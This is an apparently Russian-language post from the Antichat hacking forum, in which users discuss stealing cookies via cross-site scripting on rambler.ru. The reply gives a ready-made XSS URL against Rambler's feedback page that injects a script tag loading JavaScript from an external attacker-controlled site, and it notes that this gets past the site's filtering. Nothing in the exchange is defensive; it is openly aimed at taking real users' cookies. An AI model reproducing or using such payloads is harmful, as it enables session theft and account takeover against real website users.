
04.11.2007, 11:51
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от Tadeus
Блин, что-то на рамблере, у мну не пахаит Document.Location.Replace. Зато Document.Location.Href работает. Как через последнее можно передать cookies? 
Именно поэтому в статье для xss на рамблере я написал
Код:
http://www.rambler.ru/db/support/feedback.shtml?name="<script src=http://mysite.ru/1.js></script>
вместо document.location.replace. Там какая-то странная фильтрация идет =) Но этот вариант прокатывает.
|
|
|